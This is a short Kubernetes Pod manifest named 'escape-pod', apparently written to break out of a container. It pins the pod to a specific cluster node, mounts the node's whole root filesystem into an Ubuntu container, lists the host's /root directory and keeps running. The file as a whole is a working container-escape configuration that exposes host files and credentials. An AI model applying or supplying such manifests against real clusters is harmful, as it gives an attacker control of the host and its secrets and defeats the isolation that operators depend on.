apiVersion: v1
kind: Pod
metadata:
  name: escape-pod
  namespace: argocd
spec:
  # 直接指定节点名称
  nodeName: ip-10-110-158-103.ap-east-1.compute.internal
  containers:
  - name: ubuntu
    image: public.ecr.aws/docker/library/ubuntu:22.04
    command:
      - /bin/bash
      - -c
      - "ls -al /host-root/root/; while true; do sleep 30; done"
    volumeMounts:
    - mountPath: /host-root
      name: host-fs
  volumes:
  - name: host-fs
    hostPath:
      path: /
      type: Directory
